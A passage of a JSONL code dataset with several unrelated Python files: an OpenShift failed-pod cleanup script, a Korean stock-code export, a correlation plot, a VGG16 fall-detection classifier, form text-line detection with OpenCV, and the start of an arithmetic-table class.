inventory[project.metadata.name] = list()\n inventory[project.metadata.name].append(pod.metadata.name)\n\nif len(inventory) > 0:\n for project in inventory.keys():\n if project in skip_projects:\n continue\n for pod in inventory[project]:\n print(\"Removing pod {} in project {}\".format(pod, project))\n v1_pods.delete(namespace=project, name=pod)\nelse:\n print(\"Failed pods not found\")", "sub_path": "openshift/get_pods_errored.py", "file_name": "get_pods_errored.py", "file_ext": "py", "file_size_in_byte": 1742, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "urllib3.disable_warnings", "line_number": 4, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 6, "usage_type": "attribute"}, {"api_name": "kubernetes.client.Configuration", "line_number": 12, "usage_type": "call"}, {"api_name": "kubernetes.client", "line_number": 12, "usage_type": "attribute"}, {"api_name": "kubernetes.client.Configuration.set_default", "line_number": 16, "usage_type": "call"}, {"api_name": "kubernetes.client", "line_number": 16, "usage_type": "attribute"}, {"api_name": "kubernetes.client.ApiClient", "line_number": 17, "usage_type": "call"}, {"api_name": "kubernetes.client", "line_number": 17, "usage_type": "attribute"}, {"api_name": "openshift.dynamic.DynamicClient", "line_number": 18, "usage_type": "call"}]} +{"seq_id": "294604182", "text": "from kiwoom import *\nimport pandas as pd\nfrom datetime import datetime\nimport time\n\nkiwoom = Kiwoom()\nkiwoom.CommConnect()\nprint(\"로그인\")\n\nkospi = kiwoom.GetCodeListByMarket('0')\nkosdaq = kiwoom.GetCodeListByMarket('10')\ncodes = kospi + kosdaq\n\ndata = []\n\nfor code in codes:\n name = kiwoom.GetMasterCodeName(code)\n os_Cnt = kiwoom.GetMasterListedStockCnt(code)/10000\n Suv_days = (datetime.today().year - int(kiwoom.GetMasterListedStockDate(code)[0:4]))*365 \\\n + (datetime.today().month - int(kiwoom.GetMasterListedStockDate(code)[4:6]))*30 \\\n +(datetime.today().day - int(kiwoom.GetMasterListedStockDate(code)[6:]))\n\n if kiwoom.GetMasterConstruction(code) == '정상':\n const = ' '\n else:\n const = kiwoom.GetMasterConstruction(code)\n\n if ('거래정지' or '관리종목' or '투자유의종목') in kiwoom.GetMasterStockState(code):\n S_state = '제외'\n else:\n S_state = ' '\n\n\n data.append((code, name, os_Cnt, Suv_days, const, S_state))\n\n\n\n\ndf = pd.DataFrame(data=data, columns=['code', '종목명', '유동주식 수(만)', '상장후 운영일수',\n '감리유의', '상태유의']).set_index('code')\n## 서버에서 PER, PBR을 일일이 요청하다보니 시간이 너무 많이 걸린다 -> 크롤링이나 웹스크래핑으로 데이터 수집하는게 더 빠를듯\ndf.to_excel(\"code.xlsx\")\n\n", "sub_path": "kw_tool/To_Excel.py", "file_name": "To_Excel.py", "file_ext": "py", "file_size_in_byte": 1424, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "kiwoom.CommConnect", "line_number": 7, "usage_type": "call"}, {"api_name": "kiwoom.GetCodeListByMarket", "line_number": 10, "usage_type": "call"}, {"api_name": "kiwoom.GetCodeListByMarket", "line_number": 11, "usage_type": "call"}, {"api_name": "kiwoom.GetMasterCodeName", "line_number": 17, "usage_type": "call"}, {"api_name": "kiwoom.GetMasterListedStockCnt", "line_number": 18, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 19, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 19, "usage_type": "name"}, {"api_name": "kiwoom.GetMasterListedStockDate", "line_number": 19, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 20, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 20, "usage_type": "name"}, {"api_name": "kiwoom.GetMasterListedStockDate", "line_number": 20, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 21, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 21, "usage_type": "name"}, {"api_name": "kiwoom.GetMasterListedStockDate", "line_number": 21, "usage_type": "call"}, {"api_name": "kiwoom.GetMasterConstruction", "line_number": 23, "usage_type": "call"}, {"api_name": "kiwoom.GetMasterConstruction", "line_number": 26, "usage_type": "call"}, {"api_name": "kiwoom.GetMasterStockState", "line_number": 28, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "504861273", "text": "import numpy as np\nimport matplotlib.pyplot as plt\n\n\nscores = []\nratings = []\nwith open('scores_and_ratings.txt') as f:\n lines = f.readlines()\n for line in lines:\n splitLine = line.split(',')\n scores.append(float(splitLine[0]))\n ratings.append(float(splitLine[1]))\nf.close()\nprint(np.corrcoef(ratings, scores))\n\n#plt.plot(ratings, scores)\nplt.scatter(ratings, scores)\nplt.savefig('plot.png')\n\n", "sub_path": "exercise_1/investigations/hospitals_and_patients/plot_correlation.py", "file_name": "plot_correlation.py", "file_ext": "py", "file_size_in_byte": 420, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "numpy.corrcoef", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 18, "usage_type": "name"}]} +{"seq_id": "76635353", "text": "import os\nimport matlab.engine\nimport numpy as np\nimport time\nimport shutil\nfrom os import listdir\nfrom os.path import isfile, join\nfrom sklearn.model_selection import train_test_split\n\nimport keras \nfrom keras.datasets import mnist\nfrom keras.layers import Conv2D, MaxPooling2D, AveragePooling2D\nfrom keras.layers import Dense, Flatten\nfrom keras import optimizers\nfrom keras.models import Sequential\nfrom keras.layers import Input, Lambda, Dense, Flatten\nfrom keras.models import Model\nfrom keras.applications.vgg16 import VGG16\nfrom keras.applications.vgg16 import preprocess_input\nfrom keras.preprocessing import image\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.models import Sequential\nimport keras.backend as K\nimport numpy as np\nfrom glob import glob\nimport matplotlib.pyplot as plt\n\n\n\n#get filenames for data\nnames = ['GraceSpecs', 'MarcSpecs', 'PeteSpecs']\nsubDirs = ['fallingSitting', 'fallingStanding', 'fallingWalking', 'Movement', 'Sitting', 'Walking']\n\n#get filenames for data\npath = \"../../../ECE_Senior_Design_Our_Data\"\nfallingSittingFiles = []\nfallingStandingFiles = []\nfallingWalkingFiles = []\nmovementFiles = []\nsittingFiles = []\nwalkingFiles = []\n\nfor name in names:\n fallingSittingFiles = fallingSittingFiles + [(path + \"/\" + name + \"/\" + subDirs[0] + \"/\" + f) for f in listdir(join(path, name, subDirs[0])) if isfile(join(path, name, subDirs[0], f))]\n fallingStandingFiles = fallingStandingFiles + [(path + \"/\" + name + \"/\" + subDirs[1] + \"/\" + f) for f in listdir(join(path, name, subDirs[1])) if isfile(join(path, name, subDirs[1], f))]\n fallingWalkingFiles = fallingWalkingFiles + [(path + \"/\" + name + \"/\" + subDirs[2] + \"/\" + f) for f in listdir(join(path, name, subDirs[2])) if isfile(join(path, name, subDirs[2], f))]\n movementFiles = movementFiles + [(path + \"/\" + name + \"/\" + subDirs[3] + \"/\" + f) for f in listdir(join(path, name, subDirs[3])) if isfile(join(path, name, subDirs[3], f))]\n sittingFiles = sittingFiles + [(path + \"/\" + name + \"/\" + subDirs[4] + \"/\" + f) for f in listdir(join(path, name, subDirs[4])) if isfile(join(path, name, subDirs[4], f))]\n walkingFiles = walkingFiles + [(path + \"/\" + name + \"/\" + subDirs[5] + \"/\" + f) for f in listdir(join(path, name, subDirs[5])) if isfile(join(path, name, subDirs[5], f))]\n\n#make classification list\nresultsFallingSitting = [0] * len(fallingSittingFiles)\nresultsFallingStanding = [1] * len(fallingStandingFiles)\nresultsFallingWalking = [2] * len(fallingWalkingFiles)\n\nresultsMovement = [3] * len(movementFiles)\nresultsSitting = [4] * len(sittingFiles)\nresultsWalking = [5] * len(walkingFiles)\n\n#prepare data for feature selection\nfallingSittingFiles = np.array(fallingSittingFiles)\nfallingStandingFiles = np.array(fallingStandingFiles)\nfallingWalkingFiles = np.array(fallingWalkingFiles)\n\nmovementFiles = np.array(movementFiles)\nsittingFiles = np.array(sittingFiles)\nwalkingFiles = np.array(walkingFiles)\n\nfallingSittingData_Train, fallingSittingData_Test, fallingSittingData_TrainResults, fallingSittingData_TestResults = train_test_split(fallingSittingFiles, resultsFallingSitting, test_size = 0.3)\nfallingStandingData_Train, fallingStandingData_Test, fallingStandingData_TrainResults, fallingStandingData_TestResults = train_test_split(fallingStandingFiles, resultsFallingStanding, test_size = 0.3)\nfallingWalkingData_Train, fallingWalkingData_Test, fallingWalkingData_TrainResults, fallingWalkingData_TestResults = train_test_split(fallingWalkingFiles, resultsFallingWalking, test_size = 0.3)\n\nmovementData_Train, movementData_Test, movementData_TrainResults, movementData_TestResults = train_test_split(movementFiles, resultsMovement, test_size = 0.3)\nsittingData_Train, sittingData_Test, sittingData_TrainResults, sittingData_TestResults = train_test_split(sittingFiles, resultsSitting, test_size = 0.3)\nwalkingData_Train, walkingData_Test, walkingData_TrainResults, walkingData_TestResults = train_test_split(walkingFiles, resultsWalking, test_size = 0.3)\n\nos.mkdir(\"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN\")\nos.mkdir(\"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN/train\")\nos.mkdir(\"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN/test\")\n\nos.mkdir(\"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN/train/fallingSittingFiles\")\nos.mkdir(\"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN/test/fallingSittingFiles\")\n\nos.mkdir(\"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN/train/fallingStandingFiles\")\nos.mkdir(\"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN/test/fallingStandingFiles\")\n\nos.mkdir(\"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN/train/fallingWalkingFiles\")\nos.mkdir(\"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN/test/fallingWalkingFiles\")\n\nos.mkdir(\"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN/train/movementFiles\")\nos.mkdir(\"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN/test/movementFiles\")\n\nos.mkdir(\"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN/train/sittingFiles\")\nos.mkdir(\"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN/test/sittingFiles\")\n\nos.mkdir(\"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN/train/walkingFiles\")\nos.mkdir(\"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN/test/walkingFiles\")\n\nfor spec in fallingSittingData_Train:\n shutil.copy(spec, \"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN/train/fallingSittingFiles/\"+ \"_\" + spec.rsplit('/', 5)[-2] + \"_\" + spec.rsplit('/', 5)[-3] + spec.rsplit('/', 5)[-1])\nfor spec in fallingSittingData_Test:\n shutil.copy(spec, \"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN/test/fallingSittingFiles/\"+ \"_\" + spec.rsplit('/', 5)[-2] + \"_\" + spec.rsplit('/', 5)[-3] + spec.rsplit('/', 5)[-1])\n\nfor spec in fallingStandingData_Train:\n shutil.copy(spec, \"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN/train/fallingStandingFiles/\"+ \"_\" + spec.rsplit('/', 5)[-2] + \"_\" + spec.rsplit('/', 5)[-3] + spec.rsplit('/', 5)[-1])\nfor spec in fallingStandingData_Test:\n shutil.copy(spec, \"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN/test/fallingStandingFiles/\"+ \"_\" + spec.rsplit('/', 5)[-2] + \"_\" + spec.rsplit('/', 5)[-3] + spec.rsplit('/', 5)[-1])\n\nfor spec in fallingWalkingData_Train:\n shutil.copy(spec, \"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN/train/fallingWalkingFiles/\"+ \"_\" + spec.rsplit('/', 5)[-2] + \"_\" + spec.rsplit('/', 5)[-3] + spec.rsplit('/', 5)[-1])\nfor spec in fallingWalkingData_Test:\n shutil.copy(spec, \"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN/test/fallingWalkingFiles/\"+ \"_\" + spec.rsplit('/', 5)[-2] + \"_\" + spec.rsplit('/', 5)[-3] + spec.rsplit('/', 5)[-1])\n\nfor spec in movementData_Train:\n shutil.copy(spec, \"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN/train/movementFiles/\"+ \"_\" + spec.rsplit('/', 5)[-2] + \"_\" + spec.rsplit('/', 5)[-3] + spec.rsplit('/', 5)[-1])\nfor spec in movementData_Test:\n shutil.copy(spec, \"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN/test/movementFiles/\"+ \"_\" + spec.rsplit('/', 5)[-2] + \"_\" + spec.rsplit('/', 5)[-3] + spec.rsplit('/', 5)[-1])\n\nfor spec in sittingData_Train:\n shutil.copy(spec, \"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN/train/sittingFiles/\"+ \"_\" + spec.rsplit('/', 5)[-2] + \"_\" + spec.rsplit('/', 5)[-3] + spec.rsplit('/', 5)[-1])\nfor spec in sittingData_Test:\n shutil.copy(spec, \"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN/test/sittingFiles/\"+ \"_\" + spec.rsplit('/', 5)[-2] + \"_\" + spec.rsplit('/', 5)[-3] + spec.rsplit('/', 5)[-1])\n\nfor spec in walkingData_Train:\n shutil.copy(spec, \"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN/train/walkingFiles/\"+ \"_\" + spec.rsplit('/', 5)[-2] + \"_\" + spec.rsplit('/', 5)[-3] + spec.rsplit('/', 5)[-1])\nfor spec in walkingData_Test:\n shutil.copy(spec, \"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN/test/walkingFiles/\"+ \"_\" + spec.rsplit('/', 5)[-2] + \"_\" + spec.rsplit('/', 5)[-3] + spec.rsplit('/', 5)[-1])\n\nfrom keras.preprocessing.image import ImageDataGenerator\n\ntrain_datagen = ImageDataGenerator(rescale = 1./255,\n shear_range = 0.2,\n zoom_range = 0.2,\n horizontal_flip = True)\n\ntest_datagen = ImageDataGenerator(rescale = 1./255)\n\ntraining_set = train_datagen.flow_from_directory(\"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN/train\",\n target_size = (224, 224),\n batch_size = 8,\n subset=\"training\",\n class_mode = 'categorical')\n\ntest_set = train_datagen.flow_from_directory(\"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN/test\",\n target_size = (224, 224),\n batch_size = 8,\n class_mode = 'categorical')\n\nSTEP_SIZE_TRAIN=training_set.n//training_set.batch_size\nSTEP_SIZE_TEST=test_set.n//test_set.batch_size\n\nIMAGE_SIZE = [224, 224]\nvgg = VGG16(input_shape=IMAGE_SIZE + [3], weights='imagenet', include_top=False)\n#here [3] denotes for RGB images(3 channels)\n\n#don't train existing weights\nfor layer in vgg.layers:\n layer.trainable = False\n \nx = Flatten()(vgg.output)\nprediction = Dense(6, activation='softmax')(x)\nmodel = Model(inputs=vgg.input, outputs=prediction)\nmodel.compile(loss='categorical_crossentropy',\n optimizer=optimizers.Adam(),\n metrics=['accuracy'])\nmodel.summary()\n\nfrom datetime import datetime\nfrom keras.callbacks import ModelCheckpoint, LearningRateScheduler\nfrom keras.callbacks import ReduceLROnPlateau\nlr_reducer = ReduceLROnPlateau(factor=np.sqrt(0.1),\n cooldown=0,\n patience=5,\n min_lr=0.5e-6)\ncheckpoint = ModelCheckpoint(filepath='mymodel.h5', \n verbose=1, save_best_only=True)\ncallbacks = [checkpoint, lr_reducer]\nstart = datetime.now()\nhistory = model.fit_generator(training_set, \n steps_per_epoch=STEP_SIZE_TRAIN, \n epochs = 50, verbose=5)\nduration = datetime.now() - start\nprint(\"Training completed in time: \", duration)\n\nscore = model.evaluate(test_set)\nprint('Test Loss:', score[0])\nprint('Test accuracy:', score[1])\n\n#print(history.history[\"f1\"])\nmodel.save('storedAllClassCNN.h5')\n\nshutil.rmtree(\"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN\") ", "sub_path": "findResults/utilities/createAllClassCNNModel.py", "file_name": "createAllClassCNNModel.py", "file_ext": "py", "file_size_in_byte": 10752, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.listdir", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 44, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 45, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 46, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 47, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 48, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 67, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 69, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 70, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 71, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 73, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 74, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 75, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 77, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 78, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 79, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 81, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 82, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 84, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 85, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 87, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 88, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 90, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 91, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 93, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 94, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 96, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 97, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 100, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 102, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 105, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 107, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 110, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 112, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 115, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 117, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 120, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 122, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 125, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 127, "usage_type": "call"}, {"api_name": "keras.preprocessing.image.ImageDataGenerator", "line_number": 131, "usage_type": "call"}, {"api_name": "keras.preprocessing.image.ImageDataGenerator", "line_number": 136, "usage_type": "call"}, {"api_name": "keras.applications.vgg16.VGG16", "line_number": 153, "usage_type": "call"}, {"api_name": "keras.layers.Flatten", "line_number": 160, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 161, "usage_type": "call"}, {"api_name": "keras.models.Model", "line_number": 162, "usage_type": "call"}, {"api_name": "keras.optimizers.Adam", "line_number": 164, "usage_type": "call"}, {"api_name": "keras.optimizers", "line_number": 164, "usage_type": "name"}, {"api_name": "keras.callbacks.ReduceLROnPlateau", "line_number": 171, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 171, "usage_type": "call"}, {"api_name": "keras.callbacks.ModelCheckpoint", "line_number": 175, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 178, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 178, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 182, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 182, "usage_type": "name"}, {"api_name": "shutil.rmtree", "line_number": 192, "usage_type": "call"}]} +{"seq_id": "167326778", "text": "import os\n\nimport cv2\nimport numpy as np\n\nfrom flax_core.segment.utils.denoise_textline import refine_textline\n\n\ndef merge_hor_lines(lines):\n '''\n Merge detected lines whose y-coordinates are in a predefined range\n :param lines:list of lines with their coordinates\n :return: merged lines\n '''\n cp_lines = lines[:]\n i, j = 0, 1\n while i < len(cp_lines) - 1:\n line = cp_lines[i]\n x1, y1, x2, y2 = line[0], line[1], line[2], line[3]\n j = i + 1\n while j < len(cp_lines):\n map_line = cp_lines[j]\n x3, y3, x4, y4 = map_line[0], map_line[1], map_line[2], map_line[3]\n if abs(y1 - y3) < 30:\n cp_lines = np.delete(cp_lines, j, axis=0)\n else:\n i += 1\n j += 1\n break\n return cp_lines\n\n\ndef detect_line(img, debug=False):\n \"\"\"\n For clarity a textline is texts laying in a line, while line is straight line which is detected for\n the first step before detect textline\n :param img: input form image contain textline located in multiple row,separating by horizontal\n lines\n :param debug:\n :return:gray image of forms, horizontal lines(include additional lines)\n \"\"\"\n if len(img.shape) > 2:\n hei, wid, _ = img.shape\n else:\n hei, wid = img.shape\n if len(img.shape) > 2:\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n else:\n gray = img\n sub_img = gray[:, int(wid * 0.12): int(wid * 0.88)]\n edges = cv2.Canny(sub_img, 30, 170, apertureSize=7)\n minLineLength = 10\n maxLineGap = 25\n lines = cv2.HoughLinesP(edges, 1, np.pi / 180, 20, minLineLength, maxLineGap)\n sq_lines = np.squeeze(lines)\n hor_lines = sq_lines[abs(sq_lines[:, 1] - sq_lines[:, 3]) < 5]\n sorted_lines = hor_lines[hor_lines[:, 1].argsort()]\n merged_lines = merge_hor_lines(sorted_lines)\n additional_lines = add_lines(merged_lines)\n img_hor = None\n img_sq = None\n img_addition = None\n if debug:\n img_hor = img.copy()\n img_sq = img.copy()\n img_addition = img.copy()\n '''initial'''\n for line in sq_lines:\n x1, y1, x2, y2 = line\n cv2.line(img_sq, (x1, y1), (x2, y2), (0, 0, 255), 4)\n\n '''merge'''\n for line in merged_lines:\n x1, y1, x2, y2 = line\n cv2.line(img, (int(wid * 0.11), y1 + 8), (int(wid * 0.95), y2 + 8), (0, 0, 255), 4)\n\n '''hor'''\n for line in merged_lines:\n x1, y1, x2, y2 = line\n cv2.line(img_hor, (x1, y1), (x2, y2), (0, 0, 255), 4)\n\n '''additional'''\n for line in additional_lines:\n x1, y1, x2, y2 = line\n cv2.line(img_addition, (int(wid * 0.11), y1 + 8), (int(wid * 0.95), y2 + 8), (0, 0, 255), 4)\n\n return gray, additional_lines, img, img_hor, img_sq, img_addition\n\n\ndef add_lines(lines):\n \"\"\"\n Add additional lines to missing position in list detected lines\n so that all lines in list detected lines have the same gap between each other\n :param lines: list of merged horizonal lines, which is short lines in the big gaps, so that\n we need to add additional lines to these gaps\n :return:list of horizontal lines include additional lines\n \"\"\"\n # TODO:\n\n diff = np.diff(lines[:, 1], axis=0)\n sort_dif = np.sort(diff)\n mod = np.median(sort_dif)\n len_additional = 0\n for j, gap in enumerate(diff):\n if gap >= 1.7 * mod:\n base = lines[len_additional + j][1]\n for i in range(1, int(round(gap / mod))):\n lines = np.insert(lines, j + len_additional + 1, (0, base + i * mod,\n 0, base + i * mod), axis=0)\n len_additional += 1\n return lines\n\n\ndef apply_refinement(img, lines, debug):\n '''\n Apply refinement(denoise) on cut textline\n :param img:original form image\n :param lines:list of coordinates of textline image\n :param debug: loaded configuration\n :return:list of refined textlines of a form\n '''\n hei, wid = img.shape\n img_cp = cv2.cvtColor(img.copy(), cv2.COLOR_GRAY2RGB)\n ls_out_imgs = []\n for i in range(len(lines) - 1):\n x1, y1, x2, y2 = lines[i]\n x3, y3, x4, y4 = lines[i + 1]\n if debug:\n cv2.rectangle(img_cp, (int(wid * 0.08), y1 + 15), (int(wid * 0.97), y3 + 8), (255, 0, 255), 2)\n refined_im = refine_textline(img[y1 + 15:y3 + 8, int(wid * 0.08):int(wid * 0.97)])\n ls_out_imgs.append(refined_im)\n return ls_out_imgs, img_cp\n\n\ndef extract_text_line(img, debug):\n '''\n Control the process extract textline for each form\n :param img: form image to extract textline\n :param filepath:path to input image\n :return:list of refined textlines of a form\n '''\n gray, detected_lines, out_img_form, img_hor, img_sq, img_addition = \\\n detect_line(img, debug)\n ls_out_imgs, img_cp = apply_refinement(gray, detected_lines, debug)\n return ls_out_imgs, out_img_form, img_hor, img_sq, img_addition, img_cp\n\n\ndef extract_full_textline(dir):\n '''\n Extract textline in a given dir contain many forms\n :param dir: extract textline from list of forms image from a directory\n :return:None\n '''\n out_base_dir = '%s/out_test/' % (dir)\n if not os.path.exists(out_base_dir):\n os.makedirs(out_base_dir)\n for file in os.listdir(dir):\n if file.endswith('.jpg'):\n # file = 'data_for_training-2.jpg'\n filepath = '%s%s' % (dir, file)\n out_dir = filepath[:-4]\n if not os.path.exists(out_dir):\n os.makedirs(out_dir)\n gray, detected_lines = detect_line(filepath, file, out_base_dir, 0)\n apply_refinement(gray, detected_lines, out_dir, out_base_dir, file, 0)\n", "sub_path": "flax_core/segment/utils/line_detection.py", "file_name": "line_detection.py", "file_ext": "py", "file_size_in_byte": 5819, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "numpy.delete", "line_number": 25, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 47, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 47, "usage_type": "attribute"}, {"api_name": "cv2.Canny", "line_number": 51, "usage_type": "call"}, {"api_name": "cv2.HoughLinesP", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 54, "usage_type": "attribute"}, {"api_name": "numpy.squeeze", "line_number": 55, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 70, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 75, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 80, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.diff", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.sort", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.insert", "line_number": 108, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 123, "usage_type": "call"}, {"api_name": "cv2.COLOR_GRAY2RGB", "line_number": 123, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 129, "usage_type": "call"}, {"api_name": "flax_core.segment.utils.denoise_textline.refine_textline", "line_number": 130, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 155, "usage_type": "call"}, {"api_name": "os.path", "line_number": 155, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 156, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 157, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 162, "usage_type": "call"}, {"api_name": "os.path", "line_number": 162, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 163, "usage_type": "call"}]} +{"seq_id": "452094804", "text": "import config as c\nimport numpy as np\nimport pandas as pd\n\n\n\ndef print_table(t):\n df = pd.DataFrame(t)\n print(df)\n print()\n\n\nclass Arithmetic:\n def __init__(self, alphabet, plus_one, r=8, zero=0, one=1):\n self.alphabet = alphabet\n self.plus_one = [alphabet.index(x) for x in plus_one]\n self.r = r\n self.n = len(alphabet)\n self.zero = zero\n self.one = one\n self.add, self.addOV, self.mul, self.mulOV = [np.zeros((self.n, self.n), dtype=int) for i in range(4)]\n self.order = [zero, one]\n for i in range(2, self.n):\n self.order.append(self.plus_one[self.order[i-1]])\n for i in range(self.n):\n for j in range(self.n):\n self.add[i, j], self.addOV[i, j] = self.sum_ov(i, j)\n self.mul[i, j], self.mulOV[i, j] = self.mul_ov(i, j)\n print(\"Order: \", self.order)\n print(\"Add table: \\n\")\n print_table(self.add)\n print(\"Add overflow table: \\n\")\n print_table(self.addOV)\n print(\"Mul talbe: \\n\")\n print_table(self.mul)\n 